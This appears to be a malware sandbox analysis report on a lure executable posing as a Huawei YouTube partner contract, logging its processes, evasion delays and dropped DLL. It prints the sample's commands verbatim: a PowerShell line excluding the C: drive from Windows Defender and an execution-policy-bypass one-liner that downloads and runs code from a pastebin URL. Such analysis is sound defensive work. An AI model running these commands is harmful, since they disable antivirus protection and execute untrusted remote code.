Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exeMemory allocated: 2774F970000 memory reserve | memory write watchJump to behavior
Source: C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exeWindow / User API: threadDelayed 3499Jump to behavior
Source: C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exeWindow / User API: threadDelayed 617Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7534Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2176Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6697Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3089Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7099
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2414
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\jwryu2yd\jwryu2yd.dllJump to dropped file
Source: C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exe TID: 6736Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3576Thread sleep count: 7534 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3420Thread sleep count: 2176 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2948Thread sleep time: -3689348814741908s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5264Thread sleep count: 6697 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2128Thread sleep count: 3089 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1268Thread sleep time: -15679732462653109s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7036Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6544Thread sleep count: 7099 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6548Thread sleep count: 2414 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7016Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: powershell.exe, 00000004.00000002.2275873193.0000022474120000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000003.2980179958.000002B7E6F8C000.00000004.00000020.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000003.3129220728.000002B7E6F8C000.00000004.00000020.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000003.2466122737.000002B7E6F3D000.00000004.00000020.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000003.2678831163.000002B7E6F7D000.00000004.00000020.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000003.2981312025.000002B7E6F8C000.00000004.00000020.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000003.2466637902.000002B7E6F7D000.00000004.00000020.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3247768363.000002B7E6F86000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll==
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exeMemory allocated: page read and write | page guardJump to behavior

HIPS / PFW / Operating System Protection Evasion

barindex
Adds a directory exclusion to Windows Defender
Source: C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:'
Source: C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:'
Source: C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:'Jump to behavior
Source: C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:'Jump to behavior
Bypasses PowerShell execution policy
Source: C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content"
Writes to foreign memory regions
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 7FFD9A863843Jump to behavior
Source: C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:'Jump to behavior
Source: C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content"Jump to behavior
Source: C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:'Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jwryu2yd\jwryu2yd.cmdline"Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD333.tmp" "c:\Users\user\AppData\Local\Temp\jwryu2yd\CSC4A1A778723A0488D9C81AB4CE7B7E2B.TMP"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
